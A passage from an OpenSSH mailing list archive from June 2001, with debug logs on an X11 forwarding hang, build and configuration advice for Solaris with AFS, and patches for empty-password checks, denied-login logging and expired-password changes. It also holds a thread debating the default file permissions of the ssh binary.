xterm > is no longer running. > > I'll include the output as attachments. Any idea as to what is going on? > > The client is RedHat 7.1 using RPMS from the openbsd.com ftp site. The server > is SCO OpenServer 5.0.5 built with the SCO development environment. I configured > with : > > export CCFLAGS='-L/usr/local/lib -I/usr/local/include' > ./configure --sysconfdir=/etc/ssh --with-rsh=/usr/bin/rcmd --exec-prefix=/usr > > > Thanks, Aran > > Content-Description: protocol1.txt > OpenSSH_2.9p1, SSH protocols 1.5/2.0, OpenSSL 0x0090600f > debug1: Reading configuration data /home/spin/.ssh/config > debug1: Applying options for * > debug1: Applying options for njdb* > debug1: Reading configuration data /etc/ssh/ssh_config > debug1: Applying options for * > debug1: Seeding random number generator > debug1: Rhosts Authentication disabled, originating port will not be trusted. > debug1: restore_uid > debug1: ssh_connect: getuid 1000 geteuid 0 anon 1 > debug1: Connecting to njdb1b [X.X.X.X] port 22. > debug1: temporarily_use_uid: 1000/100 (e=0) > debug1: restore_uid > debug1: temporarily_use_uid: 1000/100 (e=0) > debug1: restore_uid > debug1: Connection established. > debug1: read PEM private key done: type DSA > debug1: read PEM private key done: type RSA > debug1: identity file /home/spin/.ssh/identity type 0 > debug1: Remote protocol version 1.99, remote software version OpenSSH_2.9p1 > debug1: match: OpenSSH_2.9p1 pat ^OpenSSH > debug1: Local version string SSH-1.5-OpenSSH_2.9p1 > debug1: Waiting for server public key. > debug1: Received server public key (768 bits) and host key (1024 bits). > debug1: Host 'njdb1b' is known and matches the RSA1 host key. > debug1: Found key in /home/spin/.ssh/known_hosts:3 > debug1: Encryption type: blowfish > debug1: Sent encrypted session key. > debug1: Installing crc compensation attack detector. > debug1: Received encrypted confirmation. > debug1: Trying RSA authentication via agent with 'spin at benway' > debug1: Received RSA challenge from server. > debug1: Sending response to RSA challenge. > debug1: Remote: RSA authentication accepted. > debug1: RSA authentication accepted by server. > debug1: Requesting X11 forwarding with authentication spoofing. > debug1: Requesting authentication agent forwarding. > debug1: Sending command: /usr/bin/X11/xterm -sb -sl 1000 -T njdb1b -e find /etc > debug1: Entering interactive session. > debug1: Sending eof. > debug1: Received X11 open request. > debug1: fd 4 setting O_NONBLOCK > debug1: fd 4 IS O_NONBLOCK > debug1: channel 0: new [X11 connection from X.X.X.X port 1482] > debug1: channel 0: rcvd ieof > debug1: channel 0: output open -> drain > debug1: channel 0: obuf empty > debug1: channel 0: output drain -> closed > debug1: channel 0: send oclose > debug1: channel 0: close_write > debug1: channel 0: read<=0 rfd 4 len 0 > debug1: channel 0: read failed > debug1: channel 0: input open -> drain > debug1: channel 0: close_read > debug1: channel 0: input: no drain shortcut > debug1: channel 0: ibuf empty > debug1: channel 0: input drain -> wait_oclose > debug1: channel 0: send ieof > debug1: channel 0: rcvd oclose > debug1: channel 0: input wait_oclose -> closed > debug1: channel 0: is dead > debug1: channel_free: channel 0: status: The following connections are open: > #0 X11 connection from X.X.X.X port 1482 (t4 r2 i8/0 o128/0 fd 4/4) > > Waiting for forwarded connections to terminate... > The following connections are open: > #2 X11 connection from X.X.X.X port 1482 (t4 r0 i4/0 o16/0 fd 8/8) > debug1: Transferred: stdin 0, stdout 0, stderr 164 bytes in 1.7 seconds > debug1: Bytes per second: stdin 0.0, stdout 0.0, stderr 96.3 > debug1: Exit status 0 Content-Description: protocol2.txt > OpenSSH_2.9p1, SSH protocols 1.5/2.0, OpenSSL 0x0090600f > debug1: Reading configuration data /home/spin/.ssh/config > debug1: Applying options for * > debug1: Applying options for njdb* > debug1: Reading configuration data /etc/ssh/ssh_config > debug1: Applying options for * > debug1: Seeding random number generator > debug1: Rhosts Authentication disabled, originating port will not be trusted. > debug1: restore_uid > debug1: ssh_connect: getuid 1000 geteuid 0 anon 1 > debug1: Connecting to njdb1b [X.X.X.X] port 22. > debug1: temporarily_use_uid: 1000/100 (e=0) > debug1: restore_uid > debug1: temporarily_use_uid: 1000/100 (e=0) > debug1: restore_uid > debug1: Connection established. > debug1: read PEM private key done: type DSA > debug1: read PEM private key done: type RSA > debug1: identity file /home/spin/.ssh/id_rsa type 1 > debug1: identity file /home/spin/.ssh/id_dsa type -1 > debug1: Remote protocol version 1.99, remote software version OpenSSH_2.9p1 > debug1: match: OpenSSH_2.9p1 pat ^OpenSSH > Enabling compatibility mode for protocol 2.0 > debug1: Local version string SSH-2.0-OpenSSH_2.9p1 > debug1: SSH2_MSG_KEXINIT sent > debug1: SSH2_MSG_KEXINIT received > debug1: kex: server->client blowfish-cbc hmac-md5 none > debug1: kex: client->server blowfish-cbc hmac-md5 none > debug1: SSH2_MSG_KEX_DH_GEX_REQUEST sent > debug1: expecting SSH2_MSG_KEX_DH_GEX_GROUP > debug1: dh_gen_key: priv key bits set: 139/256 > debug1: bits set: 1040/2049 > debug1: SSH2_MSG_KEX_DH_GEX_INIT sent > debug1: expecting SSH2_MSG_KEX_DH_GEX_REPLY > debug1: Host 'njdb1b' is known and matches the RSA host key. > debug1: Found key in /home/spin/.ssh/known_hosts2:11 > debug1: bits set: 1063/2049 > debug1: ssh_rsa_verify: signature correct > debug1: kex_derive_keys > debug1: newkeys: mode 1 > debug1: SSH2_MSG_NEWKEYS sent > debug1: waiting for SSH2_MSG_NEWKEYS > debug1: newkeys: mode 0 > debug1: SSH2_MSG_NEWKEYS received > debug1: done: ssh_kex2. > debug1: send SSH2_MSG_SERVICE_REQUEST > debug1: service_accept: ssh-userauth > debug1: got SSH2_MSG_SERVICE_ACCEPT > debug1: authentications that can continue: publickey,password,keyboard-interactive > debug1: next auth method to try is publickey > debug1: userauth_pubkey_agent: testing agent key /home/spin/.ssh/id_rsa > debug1: input_userauth_pk_ok: pkalg ssh-rsa blen 149 lastkey 0x80920e0 hint -1 > debug1: ssh-userauth2 successful: method publickey > debug1: fd 4 setting O_NONBLOCK > debug1: channel 0: new [client-session] > debug1: channel_new: 0 > debug1: send channel open 0 > debug1: Entering interactive session. > debug1: client_init id 0 arg 0 > debug1: Requesting X11 forwarding with authentication spoofing. > debug1: Requesting authentication agent forwarding. > debug1: Sending command: /usr/bin/X11/xterm -sb -sl 1000 -T njdb1b -e find /etc > debug1: channel 0: open confirm rwindow 0 rmax 16384 > debug1: client_input_channel_open: ctype x11 rchan 3 win 4096 max 2048 > debug1: client_request_x11: request from X.X.X.X 1485 > debug1: fd 7 setting O_NONBLOCK > debug1: fd 7 IS O_NONBLOCK > debug1: channel 1: new [x11] > debug1: confirm x11 > debug1: channel 0: read<=0 rfd 4 len 0 > debug1: channel 0: read failed > debug1: channel 0: input open -> drain > debug1: channel 0: close_read > debug1: channel 0: input: no drain shortcut > debug1: channel 0: ibuf empty > debug1: channel 0: input drain -> closed > debug1: channel 0: send eof > debug1: client_input_channel_req: channel 0 rtype exit-status reply 0 > debug1: channel 0: rcvd eof > debug1: channel 0: output open -> drain > debug1: channel 0: rcvd close > debug1: channel 1: rcvd eof > debug1: channel 1: output open -> drain > debug1: channel 0: obuf empty > debug1: channel 0: output drain -> closed > debug1: channel 0: close_write > debug1: channel 0: send close > debug1: channel 0: is dead > debug1: channel_free: channel 0: status: The following connections are open: > #0 client-session (t4 r0 i8/0 o128/0 fd -1/-1) > #1 x11 (t4 r3 i1/0 o32/0 fd 7/7) > > debug1: channel_free: channel 0: dettaching channel user > debug1: channel 1: obuf empty > debug1: channel 1: output drain -> closed > debug1: channel 1: close_write > debug1: channel 1: read<=0 rfd 7 len 0 > debug1: channel 1: read failed > debug1: channel 1: input open -> drain > debug1: channel 1: close_read > debug1: channel 1: input: no drain shortcut > debug1: channel 1: ibuf empty > debug1: channel 1: input drain -> closed > debug1: channel 1: send eof > debug1: channel 1: send close > debug1: channel 1: rcvd close > debug1: channel 1: is dead > debug1: channel_free: channel 1: status: The following connections are open: > #1 x11 (t4 r3 i8/0 o128/0 fd 7/7) From ruf at tik.ee.ethz.ch Tue Jun 19 17:48:19 2001 From: ruf at tik.ee.ethz.ch (Lukas Ruf) Date: Tue, 19 Jun 2001 09:48:19 +0200 Subject: Public Key for verification of tar balls Message-ID: <20010619094819.F27881@tik.ee.ethz.ch> Dear all, maybe I am blind but I could not find the official distribution public key for OpenSSH 2.9p2 uccellina:~!233> gpgv openssh-2.9p2.tar.gz.sig gpgv: Signature made Sun Jun 17 06:20:30 2001 MEST using DSA key ID 86FF9C48 If someone can point me to the net of gpg where to find the key -- pardon my ignorance but I cannot find it. Thanks in advance, Lukas From USENBINZ at de.ibm.com Tue Jun 19 17:59:11 2001 From: USENBINZ at de.ibm.com (USENBINZ at de.ibm.com) Date: Tue, 19 Jun 2001 09:59:11 +0200 Subject: Empty password patch Message-ID: For every (successful) ssh-connection we got an additional annoying entry in /var/log/messages like the following: Jun 19 09:06:57 LIN3135 pam_afs[5913]: AFS Won't use illegal password for user usenbinz The OpenAFS PAM module posts this message when it is called for authentication with an (disallowed) empty password. The simple patch below checks PermitEmptyPasswords in sshd_config before trying to authenticate with an empty password. This ssh option was previously ignored when PAM accepted empty passwords, but I think it is ok when a ssh option overrules PAM for a ssh connection... Setting PermitEmptyPasswords to yes will result in the old behaviour. Note that while the patch below is for the CVS version I have only tested the behaviour based on an old openssh 1.2.2 tarball from a Suse 6.4 distribution. I haven't yet figured out why, but the stuff from CVS in openbsd-compat fails to compile miserably on my systems... =================================================================== RCS file: /cvs/openssh_cvs/auth1.c,v retrieving revision 1.41 diff -u -r1.41 auth1.c --- auth1.c 2001/06/05 18:56:17 1.41 +++ auth1.c 2001/06/19 06:41:35 @@ -83,7 +83,7 @@ authctxt->valid ? "" : "illegal user ", authctxt->user); /* If the user has no password, accept authentication immediately. */ - if (options.password_authentication && + if (options.password_authentication && options.permit_empty_passwd && #ifdef KRB4 (!options.kerberos_authentication || options.kerberos_or_local_passwd) && #endif From caillat at in2p3.fr Tue Jun 19 19:55:54 2001 From: caillat at in2p3.fr (caillat at in2p3.fr) Date: Tue, 19 Jun 2001 11:55:54 +0200 (CEST) Subject: OpenSSH + Solaris + AFS ??? In-Reply-To: <20010618235625.A21297@wsc33.lrz-muenchen.de> Message-ID: <200106190955.LAA12444@ccdevli2.in2p3.fr> Hello, On 18 Jun, Ernst Boetsch wrote: > I need a working configuration of OpenSSH for Solaris 7 (SunOS 5.7) > with AFS support. PAM support to use the AFS PAm module `pam_afs.so' > and TCP-Wrapper support would be nice. > > It would be nice to have similar configurations for Solaris 6 > (SunOS 5.6), Solaris 8 (SunOS 5.8) and Solaris 2.5.1. > I successfully compiled openssh 2.9p1 for solaris 2.6 and 7, with pam, with kth-krb4 1.0.8, openssl 0.9.6a, zlib 1.1.3, tcp_wrapper, and afs 3.6, with the c compiler from sun workshop 5. My configure command line was something like: ./configure --prefix=/opt/ssh \ --with-kerberos4=/opt/krb4 \ --with-afs=/usr/afsws --with-tcp-wrappers --with-pam \ --with-ssl-dir=/opt/ssl \ --with-rsh=/usr/afsws/bin/rsh \ --with-default-path=/bin:/usr/bin:/opt/ssh/bin \ --disable-suid-ssh I had to add a line in includes.h: #include before the line: #include I also had to remove the first (added by afs or krb libs) -ldes flag in the LIBS variable in the Makefile (there's another -ldes flag added by openssl). I hope it helps... Regards, -- Laurent Caillat-Vallet | Institut National de Physique Nucleaire et de Tel. +33 (0) 4.78.93.08.80 | Physique des Particules - Centre de Calcul Fax. +33 (0) 4.72.69.41.70 | http://www.in2p3.fr/CC/ From spc at buy.pl Tue Jun 19 20:37:39 2001 From: spc at buy.pl (spc) Date: Tue, 19 Jun 2001 12:37:39 +0200 Subject: s/key Message-ID: <20010619123739.A26004@sigma.buy.pl> Hello Can someone tell me, how to enable s/key auth via OpenSSH ? I tried to enable ChallengeResponseAuthentication yes in sshd_config and SkeyAuthentication yes ChallengeResponseAuthentication yes in ssh_config As i can read in man: -v Verbose mode. Causes ssh to print debugging messages about its progress. This is helpful in debugging connection, authentica- tion, and configuration problems. The verbose mode is also used to display skey(1) challenges, if the user entered "s/key" as password. But i don't see anything about s/key there..i tried to enter s/key password and it don't work too. S/key is working properly as i can see in ftp for example..Any help will be good. Best Regards PS: I don't subscribe this group so please respond directly to me. Thx K. From markus.friedl at informatik.uni-erlangen.de Tue Jun 19 22:31:53 2001 From: markus.friedl at informatik.uni-erlangen.de (Markus Friedl) Date: Tue, 19 Jun 2001 14:31:53 +0200 Subject: 2.9p1 SCO OS 5.0.5 server and Linux client hang on exit when using X11 forwarding and protocol 2 In-Reply-To: <20010618180510.A31297@benway.cv.telegroup.com>; from acox@ia.primustel.com on Mon, Jun 18, 2001 at 06:05:10PM -0500 References: <20010613163006.A1374@benway.cv.telegroup.com> <20010618180510.A31297@benway.cv.telegroup.com> Message-ID: <20010619143153.B22082@folly> On Mon, Jun 18, 2001 at 06:05:10PM -0500, Aran Cox wrote: > Well, I almost solved my problem but caused another. I downloaded todays snapshot > and compiled that for linux. Now no X applications make it back: > > Xlib: connection to "cvcdr1b.cv.telegroup.com:10.0" refused by server > Xlib: Invalid MIT-MAGIC-COOKIE-1 key > Error: Can't open display: cvcdr1b.cv.telegroup.com:10.0 > > If I do an xhost +localhost, everything works perfectly. But I don't really > want to do an xhost +localhost on my machine, and I didn't have to before. > > Any suggestions? try DISPLAY=localhost:10.0 export DISPLAY xbiff does this work? From markus.friedl at informatik.uni-erlangen.de Tue Jun 19 22:36:14 2001 From: markus.friedl at informatik.uni-erlangen.de (Markus Friedl) Date: Tue, 19 Jun 2001 14:36:14 +0200 Subject: s/key In-Reply-To: <20010619123739.A26004@sigma.buy.pl>; from spc@buy.pl on Tue, Jun 19, 2001 at 12:37:39PM +0200 References: <20010619123739.A26004@sigma.buy.pl> Message-ID: <20010619143614.C22082@folly> On Tue, Jun 19, 2001 at 12:37:39PM +0200, spc wrote: > Hello > > Can someone tell me, how to enable s/key auth via OpenSSH ? > I tried to enable ChallengeResponseAuthentication yes in sshd_config > and SkeyAuthentication yes > ChallengeResponseAuthentication yes in ssh_config > As i can read in man: > -v Verbose mode. Causes ssh to print debugging messages about its > progress. This is helpful in debugging connection, authentica- > tion, and configuration problems. The verbose mode is also used > to display skey(1) challenges, if the user entered "s/key" as > password. this is an old manpage. try: ssh -o 'preferredauthentications keyboard-interactive' \ -o 'challengeresponseauthentication=yes' \ -o 'passwordauthentication=no' host From dwd at bell-labs.com Tue Jun 19 23:23:10 2001 From: dwd at bell-labs.com (Dave Dykstra) Date: Tue, 19 Jun 2001 08:23:10 -0500 Subject: Patch for changing expired passwords In-Reply-To: <20010619143046.A22082@folly>; from markus.friedl@informatik.uni-erlangen.de on Tue, Jun 19, 2001 at 02:30:46PM +0200 References: <20010618155545.A5924@lucent.com> <20010619143046.A22082@folly> Message-ID: <20010619082309.A17644@lucent.com> On Tue, Jun 19, 2001 at 02:30:46PM +0200, Markus Friedl wrote: > On Mon, Jun 18, 2001 at 03:55:45PM -0500, Dave Dykstra wrote: > > The primary purpose of the attached patches is for portable OpenSSH to > > support changing expired passwords as specified in shadow password files. > > hi, can you provide a > diff -u > version for me, too :) > > thanks. Sure, sorry about that. I saw somewhere that I should provide unified diffs but I didn't really know what that meant; now I do. The diffs against the two CVS versions are attached. - Dave Dykstra -------------- next part -------------- --- auth.c.O Mon Jun 18 09:31:58 2001 +++ auth.c Mon Jun 18 09:35:08 2001 @@ -68,16 +68,25 @@ shell = (pw->pw_shell[0] == '\0') ? _PATH_BSHELL : pw->pw_shell; /* deny if shell does not exists or is not executable */ - if (stat(shell, &st) != 0) + if (stat(shell, &st) != 0) { + log("User %.100s not allowed because shell %.100s does not exist", + pw->pw_name, shell); return 0; - if (!((st.st_mode & S_IFREG) && (st.st_mode & (S_IXOTH|S_IXUSR|S_IXGRP)))) + } + if (!((st.st_mode & S_IFREG) && (st.st_mode & (S_IXOTH|S_IXUSR|S_IXGRP)))) { + log("User %.100s not allowed because shell %.100s is not executable", + pw->pw_name, shell); return 0; + } /* Return false if user is listed in DenyUsers */ if (options.num_deny_users > 0) { for (i = 0; i < options.num_deny_users; i++) - if (match_pattern(pw->pw_name, options.deny_users[i])) + if (match_pattern(pw->pw_name, options.deny_users[i])) { + log("User %.100s not allowed because listed in DenyUsers", + pw->pw_name); return 0; + } } /* Return false if AllowUsers isn't empty and user isn't listed there */ if (options.num_allow_users > 0) { @@ -85,19 +94,27 @@ if (match_pattern(pw->pw_name, options.allow_users[i])) break; /* i < options.num_allow_users iff we break for loop */ - if (i >= options.num_allow_users) + if (i >= options.num_allow_users) { + log("User %.100s not allowed because not listed in AllowUsers", + pw->pw_name); return 0; + } } if (options.num_deny_groups > 0 || options.num_allow_groups > 0) { /* Get the user's group access list (primary and supplementary) */ - if (ga_init(pw->pw_name, pw->pw_gid) == 0) + if (ga_init(pw->pw_name, pw->pw_gid) == 0) { + log("User %.100s not allowed because not in any group", + pw->pw_name); return 0; + } /* Return false if one of user's groups is listed in DenyGroups */ if (options.num_deny_groups > 0) if (ga_match(options.deny_groups, options.num_deny_groups)) { ga_free(); + log("User %.100s not allowed because a group is listed in DenyGroups", + pw->pw_name); return 0; } /* @@ -108,6 +125,8 @@ if (!ga_match(options.allow_groups, options.num_allow_groups)) { ga_free(); + log("User %.100s not allowed because none of user's group are listed in AllowGroups", + pw->pw_name); return 0; } ga_free(); --- session.c.O Mon Jun 18 13:59:57 2001 +++ session.c Mon Jun 18 14:15:29 2001 @@ -93,6 +93,7 @@ void session_close(Session *s); void do_exec_pty(Session *s, const char *command); void do_exec_no_pty(Session *s, const char *command); +void do_exec(Session *s, const char *command); void do_login(Session *s, const char *command); void do_child(Session *s, const char *command); void do_motd(void); @@ -270,17 +271,7 @@ command = NULL; packet_integrity_check(plen, 0, type); } - if (forced_command != NULL) { - original_command = command; - command = forced_command; - debug("Forced command '%.500s'", forced_command); - } - if (s->ttyfd != -1) - do_exec_pty(s, command); - else - do_exec_no_pty(s, command); - if (command != NULL) - xfree(command); + do_exec(s, command); session_close(s); return; @@ -504,6 +495,35 @@ } } +/* + * This is called to fork and execute a command. If another command is + * to be forced, execute that instead. + */ +void +do_exec(Session *s, const char *command) +{ + if (forced_command) { + original_command = command; + command = forced_command; + forced_command = NULL; + debug("Forced command '%.900s'", command); + } + + if (s->ttyfd != -1) + do_exec_pty(s, command); + else + do_exec_no_pty(s, command); + + if (command != NULL) + xfree(command); + + if (original_command != NULL) { + xfree(original_command); + original_command = NULL; + } +} + + /* administrative, login(1)-like work */ void do_login(Session *s, const char *command) @@ -1288,13 +1308,8 @@ int session_shell_req(Session *s) { - /* if forced_command == NULL, the shell is execed */ - char *shell = forced_command; packet_done(); - if (s->ttyfd == -1) - do_exec_no_pty(s, shell); - else - do_exec_pty(s, shell); + do_exec(s, NULL); return 1; } @@ -1304,17 +1319,7 @@ u_int len; char *command = packet_get_string(&len); packet_done(); - if (forced_command) { - original_command = command; - command = forced_command; - debug("Forced command '%.500s'", forced_command); - } - if (s->ttyfd == -1) - do_exec_no_pty(s, command); - else - do_exec_pty(s, command); - if (forced_command == NULL) - xfree(command); + do_exec(s, command); return 1; } -------------- next part -------------- --- auth.c.O2 Mon Jun 18 14:21:06 2001 +++ auth.c Mon Jun 18 14:24:33 2001 @@ -47,6 +47,9 @@ #include "buffer.h" #include "bufaux.h" +/* set when password has expired */ +int forced_passwd_change = 0; + /* import */ extern ServerOptions options; @@ -81,13 +84,23 @@ int days = time(NULL) / 86400; /* Check account expiry */ - if ((spw->sp_expire >= 0) && (days > spw->sp_expire)) + if ((spw->sp_expire >= 0) && (days > spw->sp_expire)) { + log("User %.100s not allowed because account expired", + pw->pw_name); return 0; + } /* Check password expiry */ if ((spw->sp_lstchg >= 0) && (spw->sp_max >= 0) && - (days > (spw->sp_lstchg + spw->sp_max))) - return 0; + (days > (spw->sp_lstchg + spw->sp_max))) { + if ((pw->pw_uid == 0)) { + log("User %.100s not allowed because password expired", + pw->pw_name); + return 0; + } + + forced_passwd_change = 1; + } } #else /* Shouldn't be called if pw is NULL, but better safe than sorry... */ @@ -177,7 +190,7 @@ } /* Remove trailing newline */ *--p = '\0'; - log("Login restricted for %s: %.100s", pw->pw_name, loginmsg); + log("Login restricted for %.100s: %.100s", pw->pw_name, loginmsg); } return 0; } --- auth.h.O Tue Jun 5 15:25:06 2001 +++ auth.h Mon Jun 18 14:28:04 2001 @@ -35,6 +35,9 @@ #include #endif +/* set when password has expired */ +extern int forced_passwd_change; + typedef struct Authctxt Authctxt; typedef struct KbdintDevice KbdintDevice; --- session.c.O2 Mon Jun 18 14:21:15 2001 +++ session.c Mon Jun 18 14:39:36 2001 @@ -603,6 +603,34 @@ debug("Forced command '%.900s'", command); } + if (forced_passwd_change) { + char *user = s->pw->pw_name; + char *msg; + + if (command != NULL) + xfree(command); + + if (s->ttyfd != -1) { + msg = "Password for %.100s has expired, running 'passwd' to reset it"; + /* + * Can't pass "user" to 'passwd' because Linux doesn't + * allow it. + * Also, the prompt is friendlier without "user". + */ + command = xstrdup(PASSWD_PATH); + } else { + msg = "Password for %.100s has expired and cannot be changed without a pty"; + /* + * Without a pty, Solaris 'passwd' prints "Permission + * denied", but Linux attempts to change the password + * and fails miserably, so echo an error message instead + */ + command = xstrdup("/bin/sh -c 'echo Permission denied >&2; exit 1'"); + } + log(msg, user); + packet_send_debug(msg, user); + } + if (s->ttyfd != -1) do_exec_pty(s, command); else --- configure.in.O Sun Jun 10 12:24:52 2001 +++ configure.in Mon Jun 18 14:27:23 2001 @@ -1304,6 +1304,10 @@ AC_DEFINE_UNQUOTED(RSH_PATH, "$rsh_path") fi +AC_PATH_PROG(PASSWD_PATH, passwd) +AC_DEFINE_UNQUOTED(PASSWD_PATH, "$PASSWD_PATH") + + # Check for mail directory (last resort if we cannot get it from headers) if test ! -z "$MAIL" ; then maildir=`dirname $MAIL` --- acconfig.h.O Tue May 8 15:33:06 2001 +++ acconfig.h Mon Jun 18 14:30:16 2001 @@ -211,6 +211,9 @@ /* Define if rsh is found in your path */ #undef RSH_PATH +/* Define if passwd is found in your path */ +#undef PASSWD_PATH + /* Define if you want to allow MD5 passwords */ #undef HAVE_MD5_PASSWORDS From raye at meow.raye.com Tue Jun 19 09:52:03 2001 From: raye at meow.raye.com (Geoff Raye) Date: Mon, 18 Jun 2001 18:52:03 -0500 Subject: poor permissions on ssh binary Message-ID: <200106182352.f5INq3Z16674@meow.raye.com> I just installed portable openssh 2.9p2, but the issue I have shouldn't be unique to the portable version. I built with % ../configure --prefix=/usr/local/encap/openssh-2.9p2 --sysconfdir=/etc --with-cflags=-O2 --with-tcp-wrappers --with-ssl-dir=/usr/local --with-md5-passwords --disable-suid-ssh When it came time to make install, this command was executed: /usr/local/bin/install -c -m 0711 -s ssh /usr/local/encap/openssh-2.9p2/bin/ssh I consider it a poor choice of permissions to make ssh be 0711, and I believe that configure.in should be changed on line 1624: SSHMODE=0755 would make more sense than SSHMODE=0711 For that matter, I believe that the suid root binary has no compelling reason not to be world-readable, either, but I don't know whether there have been past security implications of this which would warrant keeping the file unreadable and not copyable. In any event, keeping non-suid ssh binaries 0711 is a choice which goes back to the original f-secure/commercial/tatu SSH. Thank you for your consideration. Geoff Raye -- Geoff Raye \ All irregularities will be handled by the forces geoff at raye.com \ controlling each dimension. Transuranic heavy \ elements may not be used where there is life. From GILBERT.R.LOOMIS at saic.com Wed Jun 20 00:14:17 2001 From: GILBERT.R.LOOMIS at saic.com (Loomis, Rip) Date: Tue, 19 Jun 2001 10:14:17 -0400 Subject: FW: poor permissions on ssh binary Message-ID: <791BD3CB503DD411A6510008C7CF647701F40C34@col-581-exs01.cist.saic.com> -----Original Message----- From: Loomis, Rip Sent: Tuesday, 19 June, 2001 09:10 To: 'geoff at raye.com' Subject: RE: poor permissions on ssh binary Geoff-- You stated that you consider it "a poor choice of permissions" to install the ssh binary as mode 0711. Since it will run perfectly with even more restrictive permissions (we typically install it mode 0511 here), what is your objection to those permissions? You state that 0755 would "make more sense" than 0711...but you haven't provided a convincing argument as to what the problem is. As a general rule when locking down a system, we change the "ugo" permissions on all security-critical executables (including all SetUID/SetGID programs) to mode 511, and although there's some additional administrative burden it has also minimized exposure to certain vulnerabilities in the past. Here's my list of pro's and con's: Disadvantages of 0711 perms: 1. Doesn't allow non-privileged users to copy the installed binaries to other systems or locations (which could be useful to that user). Advantages of 0711 perms: 1. Doesn't allow non-privileged users to read the installed binaries (which could be used to run strings against them to find out compiled options, etc.) 2. Doesn't allow non-privileged users to copy the installed binaries to other systems or locations (the copied binaries could then *potentially* be directly modified or trojaned--but this is highly unlikely in today's world). 3. System administrators can still copy the installed binaries to other systems or locations. Note that I don't think that those advantages are particularly amazing, and in fact any bad guy who wants to do something evil with OpenSSH would just start with the source. However, the binaries run just fine with the current permissions, and there's this important security concept called Least Privilege--which I'll explain in this case as "one shouldn't go around giving users or processes powers that they don't absolutely require, because one can't always predict future bugs and exposures." The bottom line is that I can't come up with a convincing reason why the permissions should change. If you've got one, then please send it to the list and the core development team can decide what to do. Any organization that wants less restrictive permissions should feel free to install it that way...but I don't feel that the current default is broken. -- Rip Loomis Senior Systems Security Engineer, SAIC CIST Brainbench MVP for Internet Security http://www.brainbench.com [Transcript 1923411] -----Original Message----- From: Geoff Raye [mailto:raye at meow.raye.com] Sent: Monday, 18 June, 2001 18:52 To: openssh at openssh.com Subject: poor permissions on ssh binary I just installed portable openssh 2.9p2, but the issue I have shouldn't be unique to the portable version. I built with % ../configure --prefix=/usr/local/encap/openssh-2.9p2 --sysconfdir=/etc --with-cflags=-O2 --with-tcp-wrappers --with-ssl-dir=/usr/local --with-md5-passwords --disable-suid-ssh When it came time to make install, this command was executed: /usr/local/bin/install -c -m 0711 -s ssh /usr/local/encap/openssh-2.9p2/bin/ssh I consider it a poor choice of permissions to make ssh be 0711, and I believe that configure.in should be changed on line 1624: SSHMODE=0755 would make more sense than SSHMODE=0711 For that matter, I believe that the suid root binary has no compelling reason not to be world-readable, either, but I don't know whether there have been past security implications of this which would warrant keeping the file unreadable and not copyable. In any event, keeping non-suid ssh binaries 0711 is a choice which goes back to the original f-secure/commercial/tatu SSH. Thank you for your consideration. Geoff Raye -- Geoff Raye \ All irregularities will be handled by the forces geoff at raye.com \ controlling each dimension. Transuranic heavy \ elements may not be used where there is life. From remailer at xganon.com Wed Jun 20 01:13:27 2001 From: remailer at xganon.com (Public ) Date: Tue, 19 Jun 2001 10:13:27 -0500 Subject: openssh-2.9p2: scp: usage message does not mention -o option Message-ID: $ scp --invalid-- somehost:somefile . scp: invalid option -- - usage: scp [-pqrvBC46] [-S ssh] [-P port] [-c cipher] [-i identity] f1 f2 or: scp [options] f1 ... fn directory The -o option is not mentioned. From acox at ia.primustel.com Wed Jun 20 03:43:24 2001 From: acox at ia.primustel.com (Aran Cox) Date: Tue, 19 Jun 2001 12:43:24 -0500 Subject: 2.9p1 SCO OS 5.0.5 server and Linux client hang on exit when using X11 forwarding and protocol 2 In-Reply-To: <20010619143153.B22082@folly>; from markus.friedl@informatik.uni-erlangen.de on Tue, Jun 19, 2001 at 02:31:53PM +0200 References: <20010613163006.A1374@benway.cv.telegroup.com> <20010618180510.A31297@benway.cv.telegroup.com> <20010619143153.B22082@folly> Message-ID: <20010619124324.A2087@benway.cv.telegroup.com> On Tue, Jun 19, 2001 at 02:31:53PM +0200, Markus Friedl wrote: > On Mon, Jun 18, 2001 at 06:05:10PM -0500, Aran Cox wrote: > > Well, I almost solved my problem but caused another. I downloaded todays snapshot > > and compiled that for linux. Now no X applications make it back: > > > > Xlib: connection to "cvcdr1b.cv.telegroup.com:10.0" refused by server > > Xlib: Invalid MIT-MAGIC-COOKIE-1 key > > Error: Can't open display: cvcdr1b.cv.telegroup.com:10.0 > > > > If I do an xhost +localhost, everything works perfectly. But I don't really > > want to do an xhost +localhost on my machine, and I didn't have to before. > > > > Any suggestions? > > try > DISPLAY=localhost:10.0 > export DISPLAY > xbiff > > does this work? No, it gives the same error message. From mmokrejs at natur.cuni.cz Wed Jun 20 05:06:04 2001 From: mmokrejs at natur.cuni.cz (=?iso-8859-2?Q?Martin_MOKREJ=A9?=) Date: Tue, 19 Jun 2001 21:06:04 +0200 (MET DST) Subject: SSH-AFS: Re: OpenSSH + Solaris + AFS ??? In-Reply-To: <200106190955.LAA12444@ccdevli2.in2p3.fr> Message-ID: Hello, if you link binaries against -ldes and -lcrypto , the resulting sshd will not work if client uses 3des , try it! (tested on Irix 6.5, Solaris 2.6). Blowfish cipher works even in the previous case (no surprise, the conflicting des code is not in use). Interrestingly, with that sshd I couldn't login as root, only as user. Working solution: Remove all occurencies of -ldes in openssh*/Makefile after the configure step. I had to edit openssh*/defines.h and kafs.h, but this I've already posted to the list (sorry, another list: see archive of krb4 at http://www.natur.cuni.cz/cgi/wilma/krb4 ). On Irix I needed to include the -I/usr/athena/include at the very beginning of the commandline - relates to the kafs.h problem. Otherwise no problems. Tested on openssh-2.9p2. The source tree with my binaries for Irix and Solaris you can get from http://nmrindy.natur.cuni.cz/afs/natur.cuni.cz/src/kth-krb_and_ssh/ -- Martin Mokrejs - PGP5.0i key is at http://www.natur.cuni.cz/~mmokrejs Faculty of Science, The Charles University From dveeravalli at telica.com Wed Jun 20 10:22:18 2001 From: dveeravalli at telica.com (Deepa Nemmili Veeravalli) Date: Tue, 19 Jun 2001 20:22:18 -0400 Subject: behaviour of sshd in debug mode Message-ID: <7AC90049E901D511A8CA009027289AEA8EBDCB@wench> Hi, I tried searching openssh docs and the archives but could not get much info on this problem i am facing with openssh. When i run the sshd on the remote machine(OpenSSH_2.9p1) in debug mode and try to login from local host(OpenSSH_2.3.0), I get into the remote host with public key authnetication.But if i run sshd without debug mode, I am prompted for passwrod authentication and eventhough i give the correct password I am refused connection. Pls can someone tell me if i am missing something... Thanks for any help, Deepa. From J.S.Peatfield at damtp.cam.ac.uk Wed Jun 20 14:56:21 2001 From: J.S.Peatfield at damtp.cam.ac.uk 